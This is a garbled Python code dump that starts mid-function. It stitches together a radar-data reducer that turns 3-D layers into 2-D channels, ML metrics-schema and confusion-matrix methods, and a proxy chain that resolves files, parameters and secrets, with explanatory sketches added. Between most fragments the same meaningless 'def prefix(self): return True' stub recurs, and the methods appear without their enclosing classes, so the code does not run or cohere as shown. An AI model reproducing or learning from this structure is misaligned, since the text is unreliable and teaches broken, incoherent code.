operation_dict=this_operation_dict) this_new_matrix = numpy.expand_dims(this_new_matrix, axis=-1) if new_radar_image_matrix is None: new_radar_image_matrix = this_new_matrix + 0. 
else: new_radar_image_matrix = numpy.concatenate( (new_radar_image_matrix, this_new_matrix), axis=-1 ) new_field_names.append(this_operation_dict[RADAR_FIELD_KEY]) new_min_heights_m_agl.append(this_operation_dict[MIN_HEIGHT_KEY]) new_max_heights_m_agl.append(this_operation_dict[MAX_HEIGHT_KEY]) new_operation_names.append(this_operation_dict[OPERATION_NAME_KEY]) example_dict.pop(REFL_IMAGE_MATRIX_KEY, None) example_dict.pop(AZ_SHEAR_IMAGE_MATRIX_KEY, None) example_dict.pop(RADAR_HEIGHTS_KEY, None) example_dict[RADAR_IMAGE_MATRIX_KEY] = new_radar_image_matrix example_dict[RADAR_FIELDS_KEY] = new_field_names example_dict[MIN_RADAR_HEIGHTS_KEY] = numpy.array( new_min_heights_m_agl, dtype=int) example_dict[MAX_RADAR_HEIGHTS_KEY] = numpy.array( new_max_heights_m_agl, dtype=int) example_dict[RADAR_LAYER_OPERATION_NAMES_KEY] = new_operation_names return example_dict
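# Illustrative input for the reducer above. The literal key strings are
# assumptions standing in for RADAR_FIELD_KEY, MIN_HEIGHT_KEY,
# MAX_HEIGHT_KEY, and OPERATION_NAME_KEY, whose actual values are defined
# elsewhere in the module; each dict collapses one reflectivity layer into a
# single 2-D channel.
list_of_operation_dicts = [
    {'radar_field_name': 'reflectivity_dbz',
     'min_height_m_agl': 1000, 'max_height_m_agl': 3000,
     'operation_name': 'max'},
    {'radar_field_name': 'reflectivity_dbz',
     'min_height_m_agl': 4000, 'max_height_m_agl': 8000,
     'operation_name': 'mean'},
]
# example_dict = reduce_examples_3d_to_2d(
#     example_dict=example_dict,
#     list_of_operation_dicts=list_of_operation_dicts)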
def prefix(self): return True
def get_schema(self): """Returns the set YAML schema for the metric class. Returns: YAML schema of the metrics type. """ return self._schema
def prefix(self): return True
def get(self): return os.environ[self._name]
def prefix(self): return True
def get_metrics(self): """Returns the stored metrics. The metrics are type checked against the set schema. Returns: Dictionary of metrics data in the format of the set schema. """ artifact_utils.verify_schema_instance(self._schema, self._values) return self._values
def prefix(self): return True
def __init__(self, resolver, proxy_type, key):
    if proxy_type == "file":
        self._method = resolver.get_file_content
    elif proxy_type == "param":
        self._method = resolver.get_parameter_value
    elif proxy_type == "secret":
        self._method = resolver.get_secret_value
    elif proxy_type == "bucket_file":
        self._method = resolver.get_bucket_file
    else:
        raise ValueError("Unknown proxy type %s" % proxy_type)
    self._key = key
def prefix(self): return True
def __init__(self, schema_file: str): self._schema = artifact_utils.read_schema_file(schema_file) self._type_name, self._metric_fields = artifact_utils.parse_schema( self._schema) self._values = {}
def prefix(self): return True
def get(self): return self._method(self._key)
def prefix(self): return True
def __getattr__(self, name: str) -> Any: """Custom __getattr__ to allow access to metrics schema fields.""" if name not in self._metric_fields: raise AttributeError('No field: {} in metrics.'.format(name)) return self._values[name]
def prefix(self): return True
def __init__(self, child_proxy): self._child_proxy = child_proxy
def prefix(self): return True
def __setattr__(self, name: str, value: Any):
    """Custom __setattr__ to allow access to metrics schema fields."""
    if not self._initialized:
        object.__setattr__(self, name, value)
        return
    if name not in self._metric_fields:
        raise RuntimeError(
            'Field: {} not defined in metric schema'.format(name))
    self._values[name] = value
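# A minimal standalone version of the __getattr__/__setattr__ pattern above:
# bootstrap internal state with object.__setattr__, then route all attribute
# access through a schema whitelist once _initialized is set. Names here are
# illustrative, not the library's.
class SchemaBacked:
    def __init__(self, fields):
        object.__setattr__(self, '_fields', set(fields))
        object.__setattr__(self, '_values', {})
        object.__setattr__(self, '_initialized', True)

    def __getattr__(self, name):
        # Called only for attributes not found the normal way.
        if name not in self._fields:
            raise AttributeError('No field: {}'.format(name))
        return self._values[name]

    def __setattr__(self, name, value):
        if not self._initialized:
            object.__setattr__(self, name, value)
            return
        if name not in self._fields:
            raise RuntimeError('Field {} not in schema'.format(name))
        self._values[name] = value

m = SchemaBacked(['accuracy'])
m.accuracy = 0.93
print(m.accuracy)  # 0.93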
def prefix(self): return True
def get(self): return json.loads(self._child_proxy.get())
def prefix(self): return True
def __init__(self): super().__init__('confidence_metrics.yaml') self._initialized = True
def prefix(self): return True
def __init__(self): super().__init__('confusion_matrix.yaml') self._matrix = [[]] self._categories = [] self._initialized = True
def prefix(self): return True
def get(self): return base64.b64decode(self._child_proxy.get())
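# The wrappers above compose into a small resolution chain: a base proxy
# fetches a raw value, and decoder proxies (json.loads, base64) wrap it.
# Self-contained sketch with stand-in class names, since this dump shows only
# unnamed method bodies; the resolver is a stub.
import json

class _StubResolver:
    def get_secret_value(self, key):
        return '{"user": "svc", "token": "abc"}'

class _BaseProxy:
    # Mirrors the resolver-dispatching __init__/get pair above.
    def __init__(self, resolver, proxy_type, key):
        self._method = {'secret': resolver.get_secret_value}[proxy_type]
        self._key = key

    def get(self):
        return self._method(self._key)

class _JsonProxy:
    # Mirrors the json.loads wrapper above.
    def __init__(self, child_proxy):
        self._child_proxy = child_proxy

    def get(self):
        return json.loads(self._child_proxy.get())

print(_JsonProxy(_BaseProxy(_StubResolver(), 'secret', 'db-creds')).get()['user'])
# -> svc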
def prefix(self): return True
def set_categories(self, categories: List[str]):
    """Sets the categories for Confusion Matrix.

    Args:
      categories: List of strings specifying the categories.
    """
    self._categories = list(categories)
    self._values['annotationSpecs'] = [
        {'displayName': category} for category in self._categories
    ]
    self._matrix = [
        [0] * len(self._categories) for _ in self._categories
    ]
    self._values['row'] = self._matrix
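# What set_categories leaves behind, reproduced as a standalone helper (the
# function name is hypothetical; the structure mirrors the method above).
from typing import List

def build_confusion_values(categories: List[str]) -> dict:
    # One annotationSpec per category plus a zero-filled square matrix
    # stored under 'row', exactly as the method constructs them.
    return {
        'annotationSpecs': [{'displayName': c} for c in categories],
        'row': [[0] * len(categories) for _ in categories],
    }

print(build_confusion_values(['cat', 'dog']))
# {'annotationSpecs': [{'displayName': 'cat'}, {'displayName': 'dog'}],
#  'row': [[0, 0], [0, 0]]}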
def prefix(self): return True
def __init__(self, key, child_proxy): try: self._key = int(key) except ValueError: self._key = key self._child_proxy = child_proxy